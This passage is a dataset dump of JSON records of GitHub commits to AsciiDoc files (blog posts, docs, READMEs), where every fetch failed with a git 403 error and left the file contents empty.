403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa9ee8b215ba2816a716d8b7adfe234924c9910","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1b8c8f238a043052c55354e0756b676f7fd6161","subject":"Add link to GitHub","message":"Add link to GitHub\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/01-introduction.adoc","new_file":"src\/sections\/01-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32017f4ea50cf45dab95f00f0164daf4da7c862d","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32daa9d79ef4aa5f85fcb3ed010a6265e750391c","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb24194028cbaf7ba4b985d277e2408a66d01049","subject":"y2b create post Becoming the \\","message":"y2b create post Becoming the \\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-04-Becoming-the-.adoc","new_file":"_posts\/2013-06-04-Becoming-the-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32fa12d7fdc7dc8ff70b383e8aae6db5da855bb1","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccde1a074b53981edfbd0e0490d9411192752d33","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56aea4f4152da679d3dff307a2905312377375ba","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/10\/14\/deref.adoc","new_file":"content\/news\/2022\/10\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"97da6ab835b01d83640e7a2e70941043d1478dc3","subject":"y2b create post Ultimate Controller Collection (XBOX 360, PS3, Wii U, Custom Controllers \\u0026 More)","message":"y2b create post Ultimate Controller Collection (XBOX 360, PS3, Wii U, Custom Controllers \\u0026 More)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-13-Ultimate-Controller-Collection-XBOX-360-PS3-Wii-U-Custom-Controllers-u0026-More.adoc","new_file":"_posts\/2013-03-13-Ultimate-Controller-Collection-XBOX-360-PS3-Wii-U-Custom-Controllers-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a3d6b2f4064c9b486bc78a851f56d3791a328b","subject":"y2b create post What's the best candy? (Candy Subscription Box)","message":"y2b create post What's the best candy? (Candy Subscription Box)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-11-Whats-the-best-candy-Candy-Subscription-Box.adoc","new_file":"_posts\/2014-04-11-Whats-the-best-candy-Candy-Subscription-Box.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d41d128a79ea013c5da3fccaff3616e589f5e92","subject":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","message":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94ccd55e175e20eb294fb5d77fb46ffbae31716","subject":"y2b create post GoPro HD Motorsports HERO Camera Unboxing \\u0026 Overview","message":"y2b create post GoPro HD Motorsports HERO Camera Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-05-GoPro-HD-Motorsports-HERO-Camera-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-01-05-GoPro-HD-Motorsports-HERO-Camera-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6e62b204704a25bfca83e66bae584208c2811e0","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64bd5e193df0fbc86177b0a9f2470dc9f173c3bd","subject":"Updated index doc file to include information about ports.","message":"Updated index doc file to include information about ports.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"caffea94593e507bea0fd93e576eb3b833f2b4b3","subject":"Update 2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","message":"Update 2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","new_file":"_posts\/2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c770575053efeda76740ff1981e39d57ad8dacd","subject":"chore: fix typo","message":"chore: fix typo\n","repos":"gravitee-io\/gravitee.io,gravitee-io\/gravitee.io,gravitee-io\/gravitee.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69829db39f85314794dad2a3f936a9cead8dc7e3","subject":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","message":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faec8038c330f29dabdcd0cea2ff403adf26c4a","subject":"Add LiftScreen 2.6 to 3.0 migration doc.","message":"Add LiftScreen 2.6 to 3.0 migration doc.\n","repos":"lift\/framework,lift\/framework,lift\/framework,lift\/framework","old_file":"docs\/migration\/2.6-to-3.0-lift-screen.adoc","new_file":"docs\/migration\/2.6-to-3.0-lift-screen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lift\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ab49647cb42bd905785dec9626557f3bd0b7c11","subject":"Deleted 1993-11-17.adoc","message":"Deleted 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b04cf509e8de18b77018152204722ffcabcd3ee","subject":"Better format","message":"Better format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"93162c0055fb1b476443f58292aef704444a3184","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4019cbb2222d7026b88540ee63917e4d968a42a9","subject":"Update doc after review","message":"Update doc after review\n","repos":"wangtuo\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,obourgain\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,nilabhsagar\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,obourgain\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,JSCooke\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,nazarewk\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,rlugojr\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,qwerty4030\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,C-Bish\/elasticsearch,geidies\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,mikemccand\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,LewayneNaidoo\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,shreejay\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,MisterAndersen\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,C-Bish\/elasticsearch,uschindler\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,StefanGor\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,i-am-Nathan\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,elasticdog\/elasticsearch,ZTE-PaaS\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,a2lin\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,alexshadow007\/elasticsearch,mjason3\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,uschindler\/elasticsearch,C-Bish\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf9207921846a4604ae72c26cf59364e2dfe4e19","subject":"Fix Readme.asciidoc sample code","message":"Fix Readme.asciidoc sample code\n","repos":"xmeta\/dinzai-datni","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmeta\/dinzai-datni.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f86ea51eb631a61c4b97af31bf9adceda4ad82","subject":"Update README.asciidoc","message":"Update README.asciidoc\n\nfix","repos":"storeframework\/ministore-project","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/storeframework\/ministore-project.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"113ab528951e72ae017b95ba9e40cab6f4e8f434","subject":"Update 2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","message":"Update 2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","new_file":"_posts\/2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ac9a3624a4d9fcecdec18ee866d5f9680d8841","subject":"Update 2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","message":"Update 2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","new_file":"_posts\/2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gscheibel\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5fc38b0c78dd4049b9c74b36968413bd24e2af7","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b31c68103719c6294d9099486ba7e041a7f411eb","subject":"Update 2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","message":"Update 2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","new_file":"_posts\/2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f106da3c8ae85f27c353a3c479894398d9e0267c","subject":"Publish 20161110-1232-showoff-zone-owo.adoc","message":"Publish 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03da8eea1184806adcfc94f12a3890cf35c174e3","subject":"Added note about removal of camel-atmosphere-websocket Karaf feature","message":"Added note about removal of camel-atmosphere-websocket Karaf feature\n","repos":"adessaigne\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,nikhilvibhav\/camel,tdiesler\/camel,cunningt\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pmoerenhout\/camel,nicolaferraro\/camel,gnodet\/camel,gnodet\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,cunningt\/camel,apache\/camel,christophd\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,tadayosi\/camel,adessaigne\/camel,gnodet\/camel,nicolaferraro\/camel,pmoerenhout\/camel,christophd\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,christophd\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,tadayosi\/camel,gnodet\/camel,cunningt\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,gnodet\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,cunningt\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,nikhilvibhav\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_6.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"784fd496f4ff9a5695559e1930bd84c38849c873","subject":"Update 2016-04-24-post-3-test.adoc","message":"Update 2016-04-24-post-3-test.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-24-post-3-test.adoc","new_file":"_posts\/2016-04-24-post-3-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269ae1eaec4a07db1deaa1930464127271af3b1d","subject":"Update 2016-08-10-Hello-World.adoc","message":"Update 2016-08-10-Hello-World.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-Hello-World.adoc","new_file":"_posts\/2016-08-10-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 